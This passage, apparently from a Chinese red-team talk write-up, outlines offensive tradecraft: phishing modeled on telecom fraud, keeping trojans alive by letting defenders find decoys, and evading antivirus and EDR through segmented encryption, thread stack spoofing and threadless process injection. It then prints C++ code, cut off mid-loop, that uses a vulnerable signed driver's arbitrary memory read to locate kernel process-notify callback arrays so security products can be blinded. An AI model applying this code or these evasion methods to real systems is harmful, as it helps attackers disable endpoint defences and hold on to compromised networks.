0px;margin-bottom: 0px;"><strong><span style="">逆向思维 （业务视角）</span></strong><span style=""></span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">定位靶标是什么？这个靶标关联的应用有哪些；</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">这个目标的路径上有哪些可能的业务应用，路径上包括的必要性防护、串联的应用。瞄准这个路径应用即可，相对线性。</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">优点：<span style="color: rgb(255, 0, 0);">相对精细</span></span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style=""><br/></span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><strong><span style="">后利用-体系化</span></strong><span style="">（这也是后续攻防的一个重点差异化的点）</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">各应用类型、维权后的下一步，例如nacos、集权</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="color: rgb(255, 0, 0);">目的不仅仅是getshell，更关键是shell后拿到我们想要的信息和托管主机权限</span><span style="">；毕竟靶标大部分情况下都是业务系统。业务系统大部分又是托管在运维系统上；假如漏洞的对抗属性、集权的后利用都是临时研究，肯定会影响进攻效率。所以也是推荐后利用的体系化储备的。</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style=""><br/></span></section><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style=""></span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style=""><br/></span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">接下来看一下进攻的体系，以及重点对抗的维度</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">三部分，整体的进攻思路、端侧的攻击手法、端侧的检测维度</span></section><section style="text-align: center;line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.3787037037037037" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=5ae78311&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtKIkBwILjibaSbnlB54lsaCzdWXELIC6VgtCeo8Cvb0hqeQFmFs8CvMGm7Nr1000PbNdnc82gvDaIQ%2F640%3Fwx_fmt%3Dpng"/></section><section style="text-align: center;line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><br/></section><section style="text-align: center;line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.3472222222222222" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=787f1a68&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtKIkBwILjibaSbnlB54lsaCzARY5HP9Y1mIbyyqPxicf9EeMqVlwfotJmnr5cRia1R9Ruy7eickdJhUibA%2F640%3Fwx_fmt%3Dpng"/></section><section style="text-align: center;line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><br/></section><section style="text-align: center;line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.3453703703703704" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=92ab1b17&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtKIkBwILjibaSbnlB54lsaCzIBCzj4iaHV0lia2ibA8IVv1Y3QaJA284PAKHhdtHGc98sF8npZNhkmYog%2F640%3Fwx_fmt%3Dpng"/></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><br/></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">根据实战也得出，攻击者会产生各类行为动作，其中<span style="color: rgb(255, 0, 0);">90%的行为动作</span>在端上进行。</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style=""><br/></span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">红队创新点的这个图，上次第一届ADconf 的时候提到过，主要讲了关于整个攻击链从信息收集到靶标获取这个过程可以优化和创新的点，这次我们把这些攻击思路具象到端侧，端侧的攻击思路和端侧的防御思路，毕竟主要对抗在端侧和流量侧，我们找到对应的逃逸方法和升级思路。</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style=""><br/></span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><strong><span style="">端侧常见的攻击方法：</span></strong><span style=""></span></section><ol class="list-paddingleft-1" style="list-style-type: decimal;"><li><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">钓鱼突破，现在的方式也比较多，正常业务用到什么方式我们就用什么方法，包括邮件、电话、社交、短信、功能等，尤其电话，直接打电话肯定能够制造一种紧迫感。越来越逼近电信诈骗...的手段和技术； </span></section></li><li><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">维持据点现在最多是白利用，当然还是穿插了一些隐匿策略，<span style="color: rgb(255, 0, 0);">目的一定是把木马留在内网</span>，可以慢一些，在强对抗模式下求快反而会更慢，<span style="color: rgb(255, 0, 0);">木马免杀、权限维持、攻击手法三者相辅相成</span>，其中一个出现问题，都导致木马被踢出；另外我们实战过程也会根据场景去构建，故意让分析人员找到的木马，这样分析人员也觉得有了新的阶段性成果。宗旨是允许被杀、但不能被杀尽。毕竟他如果没有排查出来木马，很可能直接重装，反而我们得损失更大，所以我们需要让他查杀出来。<span style="color: rgb(255, 0, 0);">并且让防守分析人员觉得有成就感</span>；</span></section></li><li><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">漏洞攻击，一般如果没有常规的弱口令和漏洞，后面基本上跟前渗透打点过程一样。包括常见的漏洞攻击、Web应用漏洞等，   专项协议的漏洞越来越明显，例如存在一些大端口的专有协议漏洞（二进制相关洞）；</span></section></li><li><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">认证的突破，漏洞与认证相辅相成，内网信息收集二次加工和关联，肯定有效果；</span></section></li><li><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">集权类，通过端打总控，然后总控去控制其他端；  （上帝视角） </span></section></li><li><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">滚雪球式的横向移动（成果的拓展关联）。</span></section></li></ol><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><br/></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><strong><span style="">端侧的检测维度：</span></strong><span style=""></span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">1. 文件特征，包括像常见的特征码、导入导出表、调用链、信息熵等</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">2. 进程特征，包括子进程和线程的创建，模块加载、提权行为、API调用等</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">3. 内存特征，包括内存映像、现成堆栈等</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">4. 流量特征，包括恶意域名、心跳特征、协议特征等</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><br/></section><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><br/></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">端侧安全逃逸的手法归纳：</span></section><section style="text-align: center;line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.3398148148148148" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=cf5a6a16&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtKIkBwILjibaSbnlB54lsaCz58t4KoUoJn8b6B0PMXwBgRJkR7hB0u5OudJ9nFGoQHyKmOcwRTJjFQ%2F640%3Fwx_fmt%3Dpng"/></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style=""></span></section><ol class="list-paddingleft-1" style="list-style-type: decimal;"><li><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">静态文件逃逸，常见的方法有：API重写动态加载、免杀壳伪造入口点、SMC(Self-Modifying Code)、细粒度分段加密、基本上主旨思路就是降低“危险值”</span></section></li><li><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">内存特征逃逸，常见的手法有：shellcode内存加密/自解密运行、线程堆栈欺骗、干扰语义分析引擎、虚拟机壳</span></section></li><li><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">进程行为逃逸，常见的手法有：syscall unhook   反射dll注入、 进程注入</span></section></li><li><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">EDR致盲的手法：用户态R3的高权限句柄、DOS漏洞；内核态R0的  白签名驱动-终止、自签名驱动任意读写；虚拟化的融合WCIF（<span style="color: rgb(255, 0, 0);">新</span>）</span></section></li></ol><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style=""><br/></span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">接下来我们看一下刚才那几种端侧方法的一些典型逃逸对抗方法（<span style="color: rgb(255, 0, 0);">节选</span>）</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">第一个是静态文件逃逸方向的细粒度分段加密</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">第二个是内存特征逃逸方向的线程堆栈欺骗</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">第三个是行为特征逃逸方向的无线程进程注入</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style=""><br/></span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><strong><span style="">关于静态文件逃逸方向的细粒度分段加密</span></strong><span style=""></span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">静态文件 主要对抗的事信息熵；对需要保护的代码数据片段进行加密，破坏可读性，同时还不能显著增加信息熵；</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">具体的方法是：每个480个字节加密48字节，可以保障在破坏加密区域代码可读性的同时，还不会增加信息熵。</span></section><section style="text-align: center;line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.27870370370370373" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=dfa026fa&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtKIkBwILjibaSbnlB54lsaCzXJwdAJBZ0jpzA4GEask4DcVhSSJic9p05LiaLE1DkX20Sw32LUT7xQRg%2F640%3Fwx_fmt%3Dpng"/></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style=""></span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><br/></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><strong><span style="">关于内存特征逃逸方向的现成堆栈欺骗</span></strong><span style=""></span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">kernel!base!SleepEX和 ntdll.dll!NtdelayExecution是beacon处于睡眠状态的标致， 0x22d6bd5bd51 这个地址，虚拟内存，恶意特征；</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style=""><br/></span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">利用对sleep 的hook，在shellcode 进入休眠状态后将线程的反馈地址改为0；这样调用链就不存在那些虚拟地址（左侧调用链的8、9、10部分），从而达到<span style="color: rgb(255, 0, 0);">堆栈欺骗</span>的效果</span></section><section style="text-align: center;line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.24259259259259258" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=f1d37dbf&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtKIkBwILjibaSbnlB54lsaCzib800iakpb70ZyMgpAtIXAwvicPlLT5qUk3cCUlW7fLiagKeAa3anQUN0w%2F640%3Fwx_fmt%3Dpng"/></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style=""></span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style=""><br/></span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><strong><span style="">关于行为特征逃逸方向的无线程进程注入</span></strong><span style=""></span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">看雪关于高级进程注入的总结（<a href="https://bbs.kanxue.com/thread-271554.htm），包括常见的Module" target="_blank">https://bbs.kanxue.com/thread-271554.htm），包括常见的Module</a> Stomping、进程镂空等；当然这些技术已经被大厂的EDR都盯上了，甚至有些技术也是厂商写出来的。</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">这个Threadless Process Injection相对新一些，更有效些。组合跨进程的内存分配，hook dll 导出函数；  把shellcode 和hook 代码写到代码空隙里，然后将一个正常加载的dll 的某个方法给patch,被动等待调用。</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">这个技术有点像module stomping， 但比起module stomping，这个是无线程的。</span></section><section style="text-align: center;line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.8168604651162791" data-s="300,640" style="" data-type="png" data-w="688" src="https://wechat2rss.xlab.app/img-proxy/?k=c62cfc9b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtKIkBwILjibaSbnlB54lsaCzO7fyO7dTQwnzAYktoVeVLg9aibXJ5iavGdicwB1TYxAytSFQTw6MHxTFA%2F640%3Fwx_fmt%3Dpng"/></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style=""></span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style=""><br/></span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><br/></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><strong><span style="">泛EDR类致盲的技术归纳</span></strong><span style=""></span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="font-size: 12px;"><em>PS：其实终端程序均可通过以下方法去致盲</em></span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">R3（用户态）</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">    利用高权限句柄；遍历伪句柄表，找到拥有EDR进程高权限句柄的程序</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">    DOS；（ MinimumStackCommitInBytes ）</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">R0（内核态）</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">    白签名驱动 ZwTerminateProcess（驱动自带的终止进程）</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">    白签名驱动任意地址写漏洞</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">巧妙利用虚拟化</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">    Windows Container Isolation Framework </span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style=""><br/></span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="">我们重点说一下典型致盲技术-白签名驱动任意地址读写</span></section><section style="line-height: 1.6em;margin-top: 0px;margin-bottom: 0px;"><span style="color: rgb(255, 0, 0);">利用任意地址读写的驱动来清除内核中杀软驱动注册的回调函数，从而致盲杀软的部分功能</span><span style=""></span></section><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="cpp"><code><span class="code-snippet_outer"><span class="code-snippet__meta">#<span class="code-snippet__meta-keyword">include</span> <span class="code-snippet__meta-string">&#34;header.h&#34;</span></span></span></code><code><span class="code-snippet_outer">HANDLE hDevice = <span class="code-snippet__literal">NULL</span>;</span></code><code><span class="code-snippet_outer">HANDLE Process = <span class="code-snippet__literal">NULL</span>;</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__function">PVOID <span class="code-snippet__title">GetNtoskrnlBase</span><span class="code-snippet__params">()</span> </span>{</span></code><code><span class="code-snippet_outer">  PRTL_PROCESS_MODULES ModuleInfo = (PRTL_PROCESS_MODULES)<span class="code-snippet__built_in">calloc</span>(<span class="code-snippet__number">1024</span> * <span class="code-snippet__number">1024</span>,<span class="code-snippet__number">1</span>);</span></code><code><span class="code-snippet_outer">  NTSTATUS status = NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)<span class="code-snippet__number">11</span>, ModuleInfo, <span class="code-snippet__number">1024</span>*<span class="code-snippet__number">1024</span>, <span class="code-snippet__literal">NULL</span>);</span></code><code><span class="code-snippet_outer">  <span class="code-snippet__keyword">if</span> (!NT_SUCCESS(status)) {</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">return</span> <span class="code-snippet__number">0</span>;</span></code><code><span class="code-snippet_outer">  }</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">  <span class="code-snippet__keyword">for</span> (<span class="code-snippet__keyword">int</span> i = <span class="code-snippet__number">0</span>; i &lt; ModuleInfo-&gt;NumberOfModules; i++)</span></code><code><span class="code-snippet_outer">  {</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">if</span> (lstrcmpiA((LPCSTR)(ModuleInfo-&gt;Modules[i].FullPathName + ModuleInfo-&gt;Modules[i].OffsetToFileName), <span class="code-snippet__string">&#34;ntoskrnl.exe&#34;</span>) == <span class="code-snippet__number">0</span>) {</span></code><code><span class="code-snippet_outer">      </span></code><code><span class="code-snippet_outer">      <span class="code-snippet__keyword">return</span> ModuleInfo-&gt;Modules[i].ImageBase;</span></code><code><span class="code-snippet_outer">    }</span></code><code><span class="code-snippet_outer">  }</span></code><code><span class="code-snippet_outer">  <span class="code-snippet__keyword">return</span> <span class="code-snippet__number">0</span>;</span></code><code><span class="code-snippet_outer">}</span></code><code><span class="code-snippet_outer"><span class="code-snippet__function">INT64 <span class="code-snippet__title">GetFuncAddress</span><span class="code-snippet__params">(CHAR* FuncName)</span> </span>{</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">  PVOID KBase=GetNtoskrnlBase();</span></code><code><span class="code-snippet_outer">  <span class="code-snippet__keyword">if</span> (KBase == <span class="code-snippet__number">0</span>) {</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__built_in">printf</span>(<span class="code-snippet__string">&#34;未找到ntoskrnl.exe基地址\n&#34;</span>);</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">return</span> <span class="code-snippet__number">0</span>;</span></code><code><span class="code-snippet_outer">  }</span></code><code><span class="code-snippet_outer">  HMODULE ntos = LoadLibraryA(<span class="code-snippet__string">&#34;ntoskrnl.exe&#34;</span>);</span></code><code><span class="code-snippet_outer">  ULONG PocAddress = (ULONG)GetProcAddress(ntos, FuncName);</span></code><code><span class="code-snippet_outer">  ULONG Offset = PocAddress - (ULONG)ntos;</span></code><code><span class="code-snippet_outer">  <span class="code-snippet__keyword">return</span> (INT64)KBase+Offset;</span></code><code><span class="code-snippet_outer">}</span></code><code><span class="code-snippet_outer"><span class="code-snippet__function">INT64 <span class="code-snippet__title">GetPspCreateProcessNotifyRoutineArray</span><span class="code-snippet__params">()</span> </span>{</span></code><code><span class="code-snippet_outer">  INT64 PsSetCallbacksNotifyRoutineAddress = GetFuncAddress((CHAR*)<span class="code-snippet__string">&#34;PsSetCreateProcessNotifyRoutine&#34;</span>);</span></code><code><span class="code-snippet_outer">  <span class="code-snippet__keyword">if</span> (PsSetCallbacksNotifyRoutineAddress == <span class="code-snippet__number">0</span>) <span class="code-snippet__keyword">return</span> <span class="code-snippet__number">0</span>;</span></code><code><span class="code-snippet_outer">  <span class="code-snippet__comment">//定位PspSetCreateProcessNotifyRoutine函数地址</span></span></code><code><span class="code-snippet_outer">  INT count = <span class="code-snippet__number">0</span>;</span></code><code><span class="code-snippet_outer">  BYTE* buffer = (BYTE*)<span class="code-snippet__built_in">malloc</span>(<span class="code-snippet__number">1</span>);</span></code><code><span class="code-snippet_outer">  <span class="code-snippet__keyword">while</span> (<span class="code-snippet__number">1</span>) {</span></code><code><span class="code-snippet_outer">    DriverReadMemery((VOID*)PsSetCallbacksNotifyRoutineAddress, buffer,<span class="code-snippet__number">1</span>);</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">if</span> (*buffer == <span class="code-snippet__number">0xE8</span> || *buffer == <span class="code-snippet__number">0xE9</span>) {</span></code><code><span class="code-snippet_outer">      <span class="code-snippet__keyword">break</span>;</span></code><code><span class="code-snippet_outer">    }</span></code><code><span class="code-snippet_outer">    PsSetCallbacksNotifyRoutineAddress = PsSetCallbacksNotifyRoutineAddress + <span class="code-snippet__number">1</span>;</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">if</span> (count == <span class="code-snippet__number">200</span>) {</span></code><code><span class="code-snippet_outer">      <span class="code-snippet__built_in">printf</span>(<span class="code-snippet__string">&#34;未找到Pspsetcreateprocessnotifyroutine 函数地址\n&#34;</span>);</span></code><code><span class="code-snippet_outer">      <span class="code-snippet__keyword">return</span> <span class="code-snippet__number">0</span>;</span></code><code><span class="code-snippet_outer">    }</span></code><code><span class="code-snippet_outer">    count++;</span></code><code><span class="code-snippet_outer">  }</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">  <span class="code-snippet__comment">//获取Pspsetcreateprocessnotifyroutine 函数的偏移地址</span></span></code><code><span class="code-snippet_outer">  UINT64 PspOffset = <span class="code-snippet__number">0</span>;</span></code><code><span class="code-snippet_outer">  <span class="code-snippet__keyword">for</span> (<span class="code-snippet__keyword">int</span> i = <span class="code-snippet__number">4</span>, k = <span class="code-snippet__number">24</span>; i &gt; <span class="code-snippet__number">0</span>; i--, k = k - <span class="code-snippet__number">8</span>){</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">    DriverReadMemery((VOID*)(PsSetCallbacksNotifyRoutineAddress + i), buffer, <span class="code-snippet__number">1</span>);</span></code><code><span class="code-snippet_outer">    PspOffset = ((UINT64)*buffer &lt;&lt; k) + PspOffset;</span></code><code><span class="code-snippet_outer">  }</span></code><code><span class="code-snippet_outer">  <span class="code-snippet__comment">// 检查符号位</span></span></code><code><span class="code-snippet_outer">  <span class="code-snippet__keyword">if</span> ((PspOffset &amp; <span class="code-snippet__number">0x00000000ff000000</span>) == <span class="code-snippet__number">0x00000000ff000000</span>)</span></code><code><span class="code-snippet_outer">    PspOffset = PspOffset | <span class="code-snippet__number">0xffffffff00000000</span>; <span class="code-snippet__comment">// 负偏移情况下的符号扩展</span></span></code><code><span class="code-snippet_outer">  </span></code><code><span class="code-snippet_outer">  INT64 PspSetCallbackssNotifyRoutineAddress = PsSetCallbacksNotifyRoutineAddress + PspOffset + <span class="code-snippet__number">5</span>;</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">  <span class="code-snippet__comment">//printf(&#34;PspSetCallbackssNotifyRoutineAddress: %I64x\n&#34;, PspSetCallbackssNotifyRoutineAddress);</span></span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">  <span class="code-snippet__comment">//获取PspCreateProcessNotifyRoutineArray 数组地址</span></span></code><code><span class="code-snippet_outer">  <span class="code-snippet__comment">//寻找lea 指令 来定位数组地址</span></span></code><code><span class="code-snippet_outer">  BYTE SearchByte1 = <span class="code-snippet__number">0x4C</span>;</span></code><code><span class="code-snippet_outer">  BYTE SearchByte2 = <span class="code-snippet__number">0x8D</span>;</span></code><code><span class="code-snippet_outer">  BYTE bArray[<span class="code-snippet__number">3</span>] = {<span class="code-snippet__number">0</span>};</span></code><code><span class="code-snippet_outer">  count = <span class="code-snippet__number">0</span>;</span></code><code><span class="code-snippet_outer">  INT64 back = PspSetCallbackssNotifyRoutineAddress;</span></code><code><span class="code-snippet_outer">  BOOL stop = FALSE;</span></code><code><span class="code-snippet_outer">  <span class="code-snippet__keyword">while</span> (count &lt;= <span class="code-snippet__number">200</span>) {</span></code><code><span class="code-snippet_outer">    DriverReadMemery((VOID*)PspSetCallbackssNotifyRoutineAddress, bArray, <span class="code-snippet__number">3</span>);</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">if</span> (bArray[<span class="code-snippet__number">0</span>] == SearchByte1 &amp;&amp; bArray[<span class="code-snippet__number">1</span>] == SearchByte2) {</span></code><code><span class="code-snippet_outer">      </span></code><code><span class="code-snippet_outer">      <span class="code-snippet__keyword">if</span> ((bArray[<span class="code-snippet__number">2</span>] == <span class="code-snippet__number">0x0D</span>) || (bArray[<span class="code-snippet__number">2</span>] == <span class="code-snippet__number">0x15</span>) || (bArray[<span class="code-snippet__number">2</span>] == <span class="code-snippet__number">0x1D</span>) || (bArray[<span class="code-snippet__number">2</span>] == <span class="code-snippet__number">0x25</span>) || (bArray[<span class="code-snippet__number">2</span>] == <span class="code-snippet__number">0x2D</span>) || (bArray[<span class="code-snippet__number">2</span>] == <span class="code-snippet__number">0x35</span>) || (bArray[<span class="code-snippet__number">2</span>] == <span class="code-snippet__number">0x3D</span>))</span></code><code><span class="code-snippet_outer">      {</span></code><code><span class="code-snippet_outer">        <span class="code-snippet__keyword">break</span>;</span></code><code><span class="code-snippet_outer">      }</span></code><code><span class="code-snippet_outer">    }</span></code><code><span class="code-snippet_outer">    PspSetCallbackssNotifyRoutineAddress = PspSetCallbackssNotifyRoutineAddress + <span class="code-snippet__number">1</span>;</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">if</span> (count == <span class="code-snippet__number">200</span>)</span></code><code><span class="code-snippet_outer">    {</span></code><code><span class="code-snippet_outer">      SearchByte1 = <span class="code-snippet__number">0x48</span>;</span></code><code><span class="code-snippet_outer">      count = <span class="code-snippet__number">-1</span>;</span></code><code><span class="code-snippet_outer">      PspSetCallbackssNotifyRoutineAddress = back;</span></code><code><span class="code-snippet_outer">      <span class="code-snippet__keyword">if</span> (stop)</span></code><code><span class="code-snippet_outer">      {</span></code><code><span class="code-snippet_outer">        <span class="code-snippet__built_in">printf</span>(<span class="code-snippet__string">&#34;未找到lea 指令，无法定位PspSetCallbackssNotifyRoutineAddress 数组\n&#34;</span>);</span></code><code><span class="code-snippet_outer">        <span class="code-snippet__keyword">return</span> <span class="code-snippet__number">0</span>;</span></code><code><span class="code-snippet_outer">      }</span></code><code><span class="code-snippet_outer">      stop = <span class="code-snippet__literal">true</span>;</span></code><code><span class="code-snippet_outer">    }</span></code><code><span class="code-snippet_outer">    count++;</span></code><code><span class="code-snippet_outer">  }</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">  PspOffset = <span class="code-snippet__number">0</span>;</span></code><code><span class="code-snippet_outer">  <span class="code-snippet__keyword">for</span> (<span class="code-snippet__keyword">int</span> i = <span class="code-snippet__number">6</span>, k = <span class="code-snippet__number">24</span>; i &gt; <span class="code-snippet__number">2</span>; i--, k = k - <span class="code-snippet__number">8</span>) {</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">    